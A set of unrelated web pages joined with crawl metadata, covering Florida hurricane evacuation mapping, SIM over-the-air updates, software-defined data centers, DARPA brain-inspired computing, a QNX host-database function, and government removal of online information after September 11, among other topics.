just doing it in an academic environment.”
<urn:uuid:b3a6b20a-f3e2-44e6-88c8-52b7f369163b>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/10/06/sdsc_s_new_storage_cloud_flickr_for_scientific_data_/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00334-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950484
1,420
3.078125
3
Having information readily available before a disaster or storm can be invaluable for first responders and emergency managers tasked with organizing the response. The Florida Coastal Mapping project is an effort that combines data collection with disaster preparedness by collecting LIDAR data — which uses light detection to capture information — for coastal counties; running the data through a computerized model to estimate storm surge depths from hurricanes; and using the information to develop new regional evacuation plans. In Florida, many regions’ hurricane evacuation studies haven’t been updated since the 1990s, according to the Florida Division of Emergency Management’s (FDEM) website. The agency plans to use the new information gathered from the mapping project to refresh the State Regional Evacuation Studies by the end of the year. “The State Regional Evacuation Studies will be used by every emergency management entity in Florida as the basis for developing evacuation and protective measure plans, shelter planning and identifying coastal high hazards zones,” FDEM spokeswoman Lauren McKeague wrote in an e-mail. “Additionally the studies will be used by all the state’s growth management agencies to identify impacts to public safety plans and to address growth management standards put in place by the Florida Legislature, including traffic and other future land use planning.” The new LIDAR data will also be available to other agencies in need of quality land contour data, according to McKeague. Betti Johnson, principal planner with the Tampa Bay Regional Planning Council, said the effort has provided the region with additional information to aid its evacuation planning. “We had looked at kind of the average hurricanes — average forward speed, average size. So we didn’t look at a Hurricane Dennis or a Hurricane Ike that were so much larger,” Johnson said. “Whereas in 2006, we had 735 hypothetical storms in our suite of storms that we looked at, this time we had 12,000. So there was a lot more information to incorporate.” The more detailed information enlarged some of the region’s areas that are expected to be vulnerable to Category 4 and 5 hurricanes. The information has also been incorporated into the council’s public outreach efforts, she said. The next step is for the local emergency managers to incorporate data from the mapping project into their planning. The information can be run through the Sea, Lake and Overland Surges from Hurricanes (SLOSH) computerized model that evaluates the threats from a hurricane storm surge and tells officials which areas need to be evacuated. SLOSH can use information from previous hurricanes or predicted hurricanes using information, including a storm's pressure, size, forward speed, forecast track as well as wind speeds and topographical data. The studies have been funded with $26 million in general fund revenue as well as FEMA grants from the 2004-2005 hurricane season. On Oct. 5, the West Florida Evacuation Study was presented to emergency managers in the region. The state has also started reviewing the South Florida transportation analysis, and the American Red Cross has begun reviewing the data collected with regard to the location of proposed evacuation shelters.
<urn:uuid:187be51e-6fd1-431d-8ad9-2e575a6a8528>
CC-MAIN-2017-04
http://www.govtech.com/geospatial/Florida-Updating-Regional-Evacuation-Studies-With-Mapping-Project-Data.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00452-ip-10-171-10-70.ec2.internal.warc.gz
en
0.946096
637
2.921875
3
OTA (Over-The-Air) is a technology used to communicate with, download applications to, and manage a SIM card without being connected physically to the card. What is OpenCard ? OTA enables a Network Operator to introduce new SIM services or to modify the contents of SIM cards in a rapid and cost-effective way. OTA is based on client/server architecture where at one end there is an operator back-end system (customer care, billing system, application server ... ) and at the other end there is a SIM card. The operator's back-end system sends service requests to an OTA Gateway which transforms the requests into Short Messages and sends them onto a Short Message Service Centre (SMSC) which transmits them to one or several SIM cards in the field. Thus, Over-The-Air (OTA) is a technology that updates and changes data in the SIM card without having to reissue it. Indeed, the end user can receive special messages from the operator, download or activate new services on his telephone, and much more ..., without having to return to a retail outlet. In order to implement OTA technology, the following components are needed: - A back end system to send requests - An OTA Gateway to process the requests in an understandable format to the SIM card - An SMSC to send requests through the wireless network - A bearer to transport the request: today it is the SMS bearer - Mobile equipment to receive the request and transmit it to the SIM card - A SIM card to receive and execute the request Back end System The back end system can be anything from a customer care operator to a billing system, a content provider or a subscriber web interface. The provisioning system has to be connected to the mobile network (either per LAN or via the Internet). Service requests contain the service requested (activate, deactivate, load, modify ...), the subscriber targeted and the data to perform the service. The back end system then sends out service requests to the OTA gateway. The OTA Gateway receives Service-Requests through a Gateway API that will indicate the actual card to modify/update/activate. In fact, inside the OTA Gateway there is a card database that indicates for each card, the SIM vendor (Gemalto, Schlumberger, DeLaRue ...), the card's identification number, the IMSI and the MSISDN. The second step is to format the service request into a message that can be understood by the recipient SIM card. To achieve this, the OTA Gateway has a set of libraries that contain the formats to use for each brand of SIM cards. The OTA Gateway then formats the message differently depending on the recipient card. The third step consists in sending a formatted message to the SMSC using the right set of parameters as described in GSM 03.48. Then the OTA Gateway issues as many SMS as required to fulfill the Service-Request. In this step the OTA Gateway is also responsible for the integrity and security of the process. Services center for short messages (SMS) exchanged between the management system of these messages (OTA Gateway) and the cellular network. A message consisting of a maximum of 160 alphanumeric character can be sent to or from a Mobile Phone. If the Mobile Phone is powered off or has left the coverage area, the message is stored and offered back to the subscriber when the mobile is powered on or has reentered the coverage area of the network. The communication between the SIM card and the OTA Gateway can be done by SMS exchange and in this case named the SMS channel. Has to be phase 2+ in the GSM standard. Mobile Phone has all the required features for handling a part or all of standardized GSM services. Regarding OTA services, the Mobile Phone has to be Sim Tool Kit compliant. Smart card provide secure user authentication and is mainly used in GSM standard as Subscriber Identification Module (SIM cards). The SIM is the major component of the GSM market paving the way to value-added services. SIM cards now offer new menus, prerecorded numbers for speed dialing, and the ability to send pre formatted short messages (SMS) to query a database or secure transactions.
<urn:uuid:98ecf303-a0ad-4cbc-8217-4a1bb563ecf3>
CC-MAIN-2017-04
http://www.gemalto.com/techno/ota/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00178-ip-10-171-10-70.ec2.internal.warc.gz
en
0.907082
876
2.578125
3
The software defined data center (SDDC) is a natural evolution of virtualization, extending it beyond virtual machines on a server to virtual networks, virtual storage, and new automated management tools with similar benefits to traditional virtualization. The term was first coined by VMware CTO Steve Herrod in 2012. In an SDCC, all physical infrastructure is treated as one resource that can be divided as needed, rather than split up by individual servers, switches, routers, hard drive, storage bays, and so on. Software and services are installed on an abstracted layer on top of data center hardware to manage virtual networks, virtualized servers, and virtual storage. All of this allows integrated and attached security and network settings for each virtual machine, and the simplified management also makes tasks like backup, archive, and application deployment much faster. Software defined infrastructure further increases efficient use of available resources, increasing utilization of physical hardware and reducing both capital and operational expense. In a software defined data center, customers can self-provision a virtual data center, specifying their required resources, network devices, and storage. The management of physical infrastructure will come from policy-driven software, defined by data center operators in accordance with service level agreements (SLAs). Software Defined Networks Software defined networking (SDN) uses software to manage all network devices as a single resource, allowing load balancing, firewalls, VPN, and more to be attached to individual virtual machines. These settings then move with the virtual machine as it communicates via the network. The virtual components are “logical” rather than physical: when two VMs are connected through a logical switch, the data transferred between them must filter through these rules before crossing the physical network. SDN decouples the control system that sends data packets from servers and decides which data packets to accept from the data system that physically transfers the packets. The physical location of network devices no longer defines network activity. Instead software controls network settings and can be placed anywhere, on any server. Each virtual network is isolated from other networks and the physical hardware, and there can practically be an infinite number of them, limited only by the resources of the server on which they are hosted and the network infrastructure through which traffic must pass. SDN supports overlapping IP addresses, which is ideal for testing and development, as individual security and network settings do not need to be set up and configured for each stage of the development and testing process. These settings were previously programmed into physical hardware – switches and routers. Software Defined Storage Software defined storage (SDS), much like SDN, treats the available pool of storage resources (often a storage area network (SAN) of fast, connected storage devices) as a single resource rather than individual drives and arrays. Management software then allows smart provisioning of storage on-demand by virtual machines. With virtualized storage, systems from multiple vendors can be managed as a single unit. Automation and Management Possibilities The software defined data center enables new possibilities for flexible, on-demand provisioning of virtual infrastructure. Users can launch pooled resources customized to specific application requirements, while overlapping hardware is utilized nearer to 100% of its capabilities. Every virtual network launched by a customer would exist in the same data center, but have its own security, firewall, and authentication requirements. When combined with data center infrastructure management software and protocols (DCIM), an SDCC can be much more efficiently managed. As customers provision their own data centers, automatic rules control what resources are used when, and everything is tracked and monitored for granular insight and control. The bottom line? Less downtime, more energy savings, and more resources available. Posted By: Joe Kozlowicz
<urn:uuid:e732d7da-9fa2-4325-afb0-fd07bdfd73e0>
CC-MAIN-2017-04
https://www.greenhousedata.com/blog/what-are-software-defined-data-centers-networks-and-storage
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00572-ip-10-171-10-70.ec2.internal.warc.gz
en
0.916633
754
3.4375
3
In the never-ending quest to get computers to process, really understand and actually reason, scientists at Defense Advanced Research Projects Agency want to look more deeply into how computers can mimic a key portion of our brain. The military's advanced research group recently put out a call, or Request For information, on how it could develop systems that go beyond machine learning, Bayesian techniques, and graphical technology to solve "extraordinarily difficult recognition problems in real-time." [NEWS: The world's craziest contraband] Current systems offer partial solutions to this problem, but are limited in their ability to efficiently scale to larger more complex datasets, DARPA said. "They are also compute intensive, exhibit limited parallelism, require high precision arithmetic, and, in most cases, do not account for temporal data. " What DARPA is interested in is looking at mimicking a portion of the brain known as the neocortex which is utilized in higher brain functions such as sensory perception, motor commands, spatial reasoning, conscious thought and language. Specfically, DARPA said it is looking for information that provides new concepts and technologies for developing what it calls a "Cortical Processor" based on Hierarchical Temporal Memory. "Although a thorough understanding of how the cortex works is beyond current state of the art, we are at a point where some basic algorithmic principles are being identified and merged into machine learning and neural network techniques. Algorithms inspired by neural models, in particular neocortex, can recognize complex spatial and temporal patterns and can adapt to changing environments. Consequently, these algorithms are a promising approach to data stream filtering and processing and have the potential for providing new levels of performance and capabilities for a range of data recognition problems," DARPA stated. "The cortical computational model should be fault tolerant to gaps in data, massively parallel, extremely power efficient, and highly scalable. It should also have minimal arithmetic precision requirements, and allow ultra-dense, low power implementations." Some of the questions DARPA is looking to answer include: - What are the capabilities and limitations of HTM-like algorithms for addressing real large-scale applications? - What algorithm or algorithms would a cortical processor execute? - What opportunities are there for significant improvements in power efficiency and speed that can be achieved by leveraging recent advances in dense memory structures, such as multi-level floating gates, processors in memory, or 3D integration? - What is the best trade-off between flexibility (or configurability) and performance? - Is it possible to build specialized architectures that demonstrate sufficient performance, price and power advantages over mainline commercial silicon to justify their design and construction? - What new capabilities could a cortical processor enable that would result in a new level of application performance? - What entirely new applications might be possible if a cortical processor were available to you? - What type of metric could be used for measuring performance and suitability to task The new RFI is only part of the research and development DARPA has been doing to build what it calls a new kind of computer with similar form and function to the mammalian brain. Such artificial brains would be used to build robots whose intelligence matches that of mice and cats, DARPA says. Recently IBM said it created DARPA-funded prototype chips that could mimic brain-like actions. The prototype chips will give mind-like abilities for computers to make decisions by collating and analyzing immense amounts of data, similar to humans gathering and understanding a series of events, Dharmendra Modha, project leader for IBM Research told the IDG News Service. The experimental chips, modeled around neural systems, mimic the brain's structure and operation through silicon circuitry and advanced algorithms. IBM hopes reverse-engineering the brain into a chip could forge computers that are highly parallel, event-driven and passive on power consumption, Modha said. The machines will be a sharp departure from modern computers, which have scaling limitations and require set programming by humans to generate results. Like the brain, IBM's prototype chips can dynamically rewire to sense, understand and act on information fed via sight, hearing, taste, smell and touch, or through other sources such as weather and water-supply monitors. The chips will help discover patterns based on probabilities and associations, all while rivaling the brain's compact size and low power usage, Modha said. Check out these other hot stories:
<urn:uuid:78b7f3f5-4ea1-4422-9362-e4e6523313da>
CC-MAIN-2017-04
http://www.networkworld.com/article/2225201/servers/darpa-wants-computers-that-fuse-with-higher-human-brain-function.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00022-ip-10-171-10-70.ec2.internal.warc.gz
en
0.937483
898
3.171875
3
Ford is leveraging Google's Prediction API to model driving behavior based on driving history. The idea is to optimize fuel and/or power consumption by guessing routes. Ford Motor Company is using Google's Prediction API to improve energy efficiency in its cars, the company said. The Prediction API is a tool developers can use to, for example, write applications that recommend content such as movies or target key customers. The tool leverages Google's massive cloud of servers and storage. At Google I/O in San Francisco May 11, Ford said the API could be used to gauge driver behavior and tune car controls to boost fuel or Specifically, Ford is using the prediction software to study driving history, including where a driver has traveled and at what time of day, over the prior two-year period. Using this driving history, which would be completely voluntary, Ford believes it will be able to divine where a driver is headed at the time of his or her departure. The motor vehicle maker said it will be able to enable the car to "optimize itself" for the route, thus preserving fuel and/or Ryan McGee, technical expert of vehicle controls architecture and algorithm design for Ford Research and Innovation, explained how this works at I/O, albeit on a screen slide show rather than an actual vehicle. When a vehicle owner opts in to use the service, an encrypted driver data usage profile is built based on routes and time of When a driver starts the car, Google Prediction software will compare the driver's historical driving behavior with current time of day and location to predict the most likely destination and how to optimize driving performance to and from that location. Then, an on-board computer might ask the driver if he or she is going to work. If the driver replied in the affirmative, the car's computer would kick in a powertrain control strategy for the trip. For example, a predicted route could include an area restricted to electric-only driving, where upon a plug-in hybrid vehicle could program itself to prescript energy usage over the total distance of the route in order to preserve enough battery power to switch to all-electric mode when In addition to being useful for electric and hybrid vehicles, Ford said it could be used for vehicles operating in "low emission zones," where electric and low-emission vehicles would be allowed to ride in certain zones. The idea, currently being tested in London, Stockholm and Berlin, is designed to preserve the environment and cut down on traffic. If a vehicle could predict exactly when it might be entering such a zone, it could program itself to comply with regulations, such as switching the engine to all-electric How the Prediction API would play with Ford's current Sync navigation and traffic information system, which also leverages the cloud to facilitate communication between vehicles, computers and drivers, is unclear. Ford's embrace of Google's Prediction API comes one year after rival General Motors at Google I/O 2010 added navigation features for its Chevrolet Volt application that help users track their vehicles using cars on Google Maps and search for destinations on Android smartphones.
<urn:uuid:aacb432a-a6a9-43d2-8083-fb239925b6f1>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Application-Development/Ford-Uses-Google-Prediction-API-to-Build-Smarter-Cars-547542
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00169-ip-10-171-10-70.ec2.internal.warc.gz
en
0.924866
668
2.796875
3
Purushothaman P.,National Institute of Hydrology | Someshwar Rao M.,National Institute of Hydrology | Kumar B.,National Institute of Hydrology | Rawat Y.S.,National Institute of Hydrology | And 7 more authors. International Journal of Earth Sciences and Engineering | Year: 2012 The physical and chemical parameters of groundwater play a significant role in classifying and assessing water quality. Hydrochemical study reveals quality of water that is suitable for irrigation, agriculture, drinking and industrial purposes. In this study groundwater samples from different aquifers, shallow, medium and deep, were collected and analysed for major ions. The analysed samples were used for classifying water type, source and quality for irrigation purpose. The major ionic abundance in the area shows that trend Ca++>Mg+>Na+>K+ (Shallow and Medium aquifer) Na+>Ca++>Mg+>K+ (Deep aquifer) and HCO3->Cl->SO4--. The dominant hydrochemical facies in shallow and medium aquifer is CaMgHCO3 type and in deep aquifer is NaHCO3 type. The drinking water quality is very good with the water quality for irrigation purpose is good in the study area. The study reveals that there is a chance of precipitation of carbonate minerals which may poses risk for soils in the study area. © 2012 CAFET-INNOVA TECHNICAL SOCIETY. Source
<urn:uuid:514a1d79-8164-48b0-a0d2-70265a3c691f>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/central-groundwater-board-north-western-region-1649315/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00041-ip-10-171-10-70.ec2.internal.warc.gz
en
0.882978
306
2.984375
3
Read the next line of the host database file #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> struct hostent * gethostent_r( FILE ** hostf, struct hostent * result, char * buffer, int buflen, int * h_errnop ); - NULL, or the address of the FILE * pointer associated with the host database file. - A pointer to a struct hostent where the function can store the host entry. - A pointer to a buffer that the function can use during the operation to store host database entries; buffer should be large enough to hold all of the data associated with the host entry. A 2K buffer is usually more than enough; a 256-byte buffer is safe in most cases. - The length of the area pointed to by buffer. - A pointer to a location where the function can store an herrno value if an error occurs. Use the -l socket option to qcc to link against this library. The gethostent_r() function is a thread-safe version of the gethostent() function. This function gets the local host's entry. If the pointer pointed to by hostf is NULL, gethostent_r() opens /etc/hosts and returns its file pointer in hostf for later use. It's the calling process's responsibility to close the host file with fclose(). The first time that you call gethostent_r(), pass NULL in the pointer pointed to by hostf. A pointer to result, or NULL if an error occurs. If an error occurs, the int pointed to by h_errnop is set to: - The supplied buffer isn't large enough to store the result. - Authoritative answer: Unknown host. - No address associated with name, look for an MX record. - Valid name, no data record of the requested type. The name is known to the name server, but has no IP address associated with it—this isn't a temporary error. Another type of request to the name server using this domain name will result in an answer (e.g. a mail-forwarder may be registered for this domain). - Unknown server error. An unexpected server failure was encountered. This is a nonrecoverable network error. - Nonauthoritative answer: Host name lookup failure. This is usually a temporary error and means that the local server didn't receive a response from an authoritative server. A retry at some later time may succeed. - Local host database file. Last modified: 2014-06-24
<urn:uuid:a9a05b03-73e3-40ab-9b31-9cf12ec40b69>
CC-MAIN-2017-04
http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/g/gethostent_r.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00463-ip-10-171-10-70.ec2.internal.warc.gz
en
0.809629
573
2.515625
3
lets assume it as a fixed length record, so it retrieves 95th record VSAM relative file organization (Also referred to as VSAM fixed-length or variable-length RRDS (relative-record data set) organization.) A VSAM relative-record data set (RRDS) contains records ordered by their relative key. The relative key is the relative record number that represents the location of the record relative to where the file begins. The relative record number identifies the fixed- or variable-length record. In a VSAM fixed-length RRDS, records are placed in a series of fixed-length slots in storage. Each slot is associated with a relative record number. For example, in a fixed-length RRDS containing 10 slots, the first slot has a relative record number of 1, and the tenth slot has a relative record number of 10. In a VSAM variable-length RRDS, the records are ordered according to their relative record number. Records are stored and retrieved according to the relative record number that you set. Throughout this documentation, the term VSAM relative-record data set (or RRDS) is used to mean both relative-record data sets with fixed-length records and with variable-length records, unless they need to be differentiated.
<urn:uuid:23ca94d5-a2b5-4595-8506-e6fb17ac45b9>
CC-MAIN-2017-04
http://ibmmainframes.com/about3840.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00463-ip-10-171-10-70.ec2.internal.warc.gz
en
0.914219
261
2.6875
3
Others have already answered this, but I wanted to say it in my own words. Sorry for the duplication. An Initial Program Load (IPL) is what you'd called "booting" on a PC. At a deeper level, you might be asking what is "booting/IPLing"? The general issue comes from the fact that computer hardware doesn't know how to run sophisticated and powerful programs by itself To do that, you need an operating system, and all hardware platforms have the capability of running multiple OSes... So you have a chicken & egg problem. The OS is needed to run programs, but a program is needed to load the OS. The solution is that the computer hardware comes with the ability to load/run a very simple program, that must be stored at a very specific place on a disk/tape/CD, and it's limited in capability, but has enough smarts to load the OS -- or, at least a part of the OS, which in turn is capable of loading programs, etc. So this simple program that the hardware knows how to run directly is called an "initial program". Now, on the PC they use the term "boot", which is short for "bootstrapping". This is a metaphor. A bootstrap is a small strap at the heel-end of a boot that you can use to pull the boot on. The metaphor is that this intiial program is a small program used to load the larger program that implements the operating system. Thus, the term "bootstrapping", or "boot" for short. IBM has never liked using "clever" terms like this. They like the terms they use to be descriptive of the actual process. They prefer a name like "Find String with PDM (FNDSTRPDM)" over a name like "grep", for example... So "bootstrap" may be clever, but many won't understand what it means. Initial program load (IPL) describes exactly what's going on in plain English. Ironically, the term "boot" is understood by more people than IPL, today. The way our world works is strange... On 10/13/2012 9:54 AM, John Mathew wrote: what is the purpose of IPL(Intial Program Load). What are steps involved in IPL. thanks in advance.
<urn:uuid:2dc144f3-8925-4282-ae5a-92fdd90a2d7d>
CC-MAIN-2017-04
http://archive.midrange.com/midrange-l/201210/msg00612.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00371-ip-10-171-10-70.ec2.internal.warc.gz
en
0.943183
516
3.078125
3
What email address or phone number would you like to use to sign in to Docs.com? If you already have an account that you use with Office or other Microsoft services, enter it here. Or sign in with: Signing in allows you to download and like content, which the author will be aware of. Embed code for: comm20 Select a size TOPIC: Global warming. ORGANIZATIONAL PATTERN: topical PURPOSE: With want I have learnt from my class and researched on the internet I want to inform my audiences about the causes and effects of global warming PRIMARY AUDIENCE OUTCOME (I want my audience to…): acknowledge about global warming, it is really happening and human plays an important part in this issue. THESIS STATEMENT (A single declarative statement that captures the essence/theme of the speech): Global warming is happening because of anthropogenic activities in the past, and it has a lot of impact in human life. ATTENTION GETTER: Do you know that 2015 is the hottest year on record since 1880. And 99% that it will be surpassed by 2016. What would you think if I said that nine out of ten warmest years have occurred in the last 14 years. Five years warmest are 2015,2014,2010,2005 and 2004. What those problems come from? The answer lies in global warming. PURPOSE (state specific purpose, relate topic to audience and establish credibility): What is happening with the Earth will affect all of us (unless you have another house on Mars). So my speech today will address one of the problem that are threating our life it is global warming. STATE THESIS & MAIN POINTS: There are many factors which include human activities have been proved to cause global warming and on the other hand the increase in Earth’s temperature affect human significantly ,many observed disaster are the consequence of global warming. 3-5 MAIN POINTS PREFERRED USE ONLY COMPLETE SENTENCES I. MAIN POINT (state as a single declarative sentence): Before we start we need to know what is global warming A. Global warming is a term used for the observed century-scale rise in the average temperature of the Earth’s climate system and its related effect. 1. Scientists are more than 90% certain that most global warming is caused by increasing concentration of greenhouse gasses and other human caused activities. B. Greenhouse effect is the trapping of the sun’s warmth in a planet’s lower atmosphere due to the greater transparency of greenhouse gases in the atmosphere to visible radiation from the sun than to infrared radiation emitted from the planet’s surface. 1. Greenhouse gasses are those that absorb and emit infrared radiation in the wavelength range emitted by the Earth. The most abundant greenhouse gasses in the atmosphere are: Water vapor (H2O), Carbon dioxide (CO2), Methane (NH4), Nitrous oxide (N2O), and Ozone (O3). 2. You can imagine greenhouse effect is like what happen in a greenhouse when the light goes through the glass, then is kept by the glass, it cannot get out by the glass, so that rise the temperature inside greenhouse. Connective: when you all have the basic concept we will move to the next part which is causes of global warming. II. Global warming is primarily problem of too much CO2 in the atmosphere which acts like a blanket, trapping heat and warming the planet. A. One of the things scientist have learned is that there are several greenhouse gases responsible for global warming, human emit them in a variety of ways. 1.The gas is responsible for the most warming is carbon dioxide, other contributors Methane, Nitrous oxide, and Chlorofluorocarbons. 2. Different gases have very different heat-trapping ability, some of them can trap more than CO2. a. One molecule of CH4 produces more than 20 times warming of a molecule of CO2. b. Nitrous is 300 times powerful than CO2. B. The sources of greenhouse gases both from anthropogenic and natural activities. 1. Human are the main source of greenhouse gases. a.CH4 released form landfill and agriculture (especially from digestive system of grazing animals). b. N20 from fertilizers, CFCS from refrigerators and industrial processes, combustion of fossil fuels in cars, factories, electricity production release CO2 and the loss of forests that would otherwise store it. Connective: There are still skeptical about the causes that rise the Earth temperature and the role of human in global warming, still there are many observed disasters that affect human life a great deal is the consequence of global warming. III. Global warming is already having significant and harmful effect on our communities, our health and climate. A. Higher temperatures are worsening many types of disasters, including storms, heat waves, floods, and droughts 1. A warmer climate creates an atmosphere that can collect, retain, and drop more water, changing weather patterns in such a way that wet areas become wetter and dry areas drier. B. The polar regions are particularly vulnerable to a warming atmosphere, average temperatures in the Arctic are rising twice as fast as they are elsewhere on earth, and the world's ice sheets are melting fast. 1. This not only has grave consequences for the region's people, wildlife, and plants; its most serious impact may be on rising sea levels. a. By 2100, it's estimated our oceans will be http://nca2014.globalchange.gov/highlights/report-findings/future-climateone to four feet higher, threatening coastal systems and low-lying areas, including entire island nations and the world's largest cities, including New York, Los Angeles, and Miami as well as Mumbai, Sydney, and Rio de Janeiro. C. The effects of global warming on the Earth's ecosystems are expected to be profound and widespread. 1.Many species of plants and animals are already moving their range northward or to higher altitudes as a result of warming temperatures. RESTATE THESIS & REVIEW MAIN POINT: Global warming is a complicated problem that need more scientific researches on the causes and the effects of global warming, however based on what we have already known, it could be said that humans are definitely a part of the problem. CONCLUDING PURPOSE (restate specific purpose, reinforce relevance of topic to audience): Earth is our home, so its life is our life. For that reason it is essential for us to comprehend what are causing our planet to become warmer and the consequence of that warming. CLOSURE/CLINCHER (end with a bang, not a whimper): Now we have known the fact of global warming, and knowledge is a power. The more we know about it the easier we can find the answer and solution. COMM20- Pubic speaking class.hose that absorb and emit infrared radiation in the wavelength range emitted by the Earth. Connective: There are still skeptical about the causes that rise the Earth temperature and the role o
<urn:uuid:772a0294-817a-4c8a-8256-59b3d73806f3>
CC-MAIN-2017-04
https://docs.com/kim-tran-1/7156/comm20
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00371-ip-10-171-10-70.ec2.internal.warc.gz
en
0.932104
1,501
2.609375
3
The terrorist attacks of Sept. 11 accelerated a trend that was beginning to develop in the world of public information. Concerns about the misuse of public information for planning terrorist attacks took center stage as federal, state and local agencies began to strip from Web sites information deemed too dangerous for public consumption. Security concerns superseded agencies' missions to provide useful information to the public and to use Web access to provide quick and easy answers to questions that would otherwise need to be fielded by agency personnel. The online revolution of the previous decade made online access to public information the model of choice among government agencies that had the technical resources and expertise to take advantage of the Internet. Moving from a reactive model of providing information in response to freedom of information requests or public affairs queries, government adopted a proactive model that allowed individuals rapid access to considerably more information than had been previously available. The model also encouraged a greater sense of interactive government where Web site access could provide clear and easy answers to questions about many government services and requirements. A significant benefit, from an agency's point of view, was that Web site access deflected the need for individuals to contact the agency directly for answers to basic questions. That model still exists, but its breadth was changed radically by the Sept. 11 attacks. Agencies continue to re-assess their online dissemination policies and to remove more information. A March memo from White House Chief of Staff Andrew Card instructed agencies to conduct "an immediate reexamination" of current measures to protect information about weapons of mass destruction. Although this memo was partly driven by reports that scientific papers providing information about how to make certain kinds of biological weapons were available through agency Web sites, it served a larger purpose as well. Card pointed out that weapons of mass destruction include "other information that could be misused to harm the security of our nation and safety of our people." A memo containing guidance, attached to Card's memo, suggested agencies review the status of classified information. That memo created a category for "sensitive, but unclassified" information and explained, "The need to protect such sensitive information from inappropriate disclosure should be carefully considered, on a case-by-case basis." OMB Watch, a public interest group in Washington, D.C., has been the most vocal critic of government's movement toward dismantling online public access. The group has kept a running tally of such incidents on its Web site. Among those agencies that have either permanently or temporarily taken information off their Web sites are the Department of Energy, NASA, the Nuclear Regulatory Commission, the Federal Energy Regulatory Commission, the U.S. Geological Survey and the National Archives. The Archives posted an explanation on its Web site saying, "In light of the terrorist events of Sept. 11, we are re-evaluating access to some previously open archival materials .... NARA seeks to reduce the risk of providing access to materials that might support terrorist activity." The states frequently follow the federal government's lead. In New York, a confidential memo prepared by James Kallstrom, director of the Office of Public Security, ordered agencies to review their holdings for "sensitive" information and to ensure that such information was not made public except where required by law. Kallstrom told the New York Times, "The intent, clearly, is to remove from the public Web sites that information that serves no other purpose than to equip potential terrorists. This is not an attempt just to shield legitimate information from the public." He added, "There is still a disconcerting amount of potentially compromising information still publicly accessible." While many agencies are taking information off line on their own initiative, state legislators have been more than willing to provide legislative directives as well. At least 17 states have passed or considered terrorism exemptions in the past legislative session. In Missouri, state Sen. Roseann Bentley proposed an exemption for records of public utilities, indicating that "in light of the new security demands on our nation, and the threats that water plants and electrical plants may be targets, the utility should be able to keep the security precautions private. Our water system in Springfield is an open lake. I don't want to frighten people, but it's very susceptible to something being put in that water." The problem with proposals like Bentley's are that they attempt to make secret something that is already public knowledge. The fact that Springfield draws its water supply from a nearby lake is already well known to Springfield residents and, probably, to many others as well. In Ohio, the Emergency Management Agency sent an e-mail to state and local agencies indicating that officials should "remove any information from public access which could potentially be misused." Such instructions have so far resulted in the closing of information about bridges and dams, the location of water mains and aerial photographs of government facilities. The U.S. Army Corps of Engineers took down information about locks and dams on the Ohio River. Corps spokesman Suzanne Fournier told the Cincinnati Enquirer, "We did that to protect the American public." Cincinnati Metropolitan Sewer District Director Pat Karney defended removing information about a local chemical facility. He told reporters, "It was absolutely nuts. It seemed to be nothing more than a catalog for terrorists to go through." One of the most controversial reversals of online access has been the EPA's decision not to make available "worst-case scenarios" for local chemical facilities. These documents discuss the consequences of a local disaster and have frequently been a focal point of the discussion of post-Sept. 11 decisions to take down information. However, Congress actually blocked EPA's plans to provide online access to such records nearly a year before Sept. 11 when the FBI suggested such records could be useful to terrorists. Congress put online access on hold while the issue was studied further. How Much is Enough? There is no doubt there is online information available that could be useful for terrorists. But such a broad standard for withholding information fails to take into account the possibility that much of the disputed information may have legitimate uses for others. Abraham Miller, an expert in terrorism at the University of Cincinnati, told the Enquirer, "It is better to err on the side of security. We do have a clear and present danger." But critics on the other side of the issue disagree. Charles Davis, director of the University of Missouri's Freedom of Information Center, said, "There is so much deference to the security argument today. There's an assumption that secrecy guarantees security. That's where I get off the bus." Lucy Dalglish, executive director of the Reporters Committee for Freedom of the Press in Arlington, Va., made the case in her prefatory remarks to the Committee's publication, "Homefront Confidential: How the War on Terrorism Affects Access to Information and the Public's Right to Know." She said, "No one has demonstrated, however, that an ignorant society is a safe society. While some information logically should be withheld because it could pose a direct threat to American ground forces or tip off a terrorist that he is under surveillance, citizens are better able to protect themselves and take action when they know the dangers they are facing." One clear result of Sept. 11 is that government Web sites will never be quite the same again. The rush to broad, cheap and rapid access to public information resources encouraged by the online revolution of the 1990s has now been temporarily stopped in its tracks by questions about how much access is too much.
<urn:uuid:4661e36a-74c0-49b5-be69-ef59d401ff73>
CC-MAIN-2017-04
http://www.govtech.com/policy-management/An-End-to-Easy-Access.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00279-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952212
1,504
2.765625
3
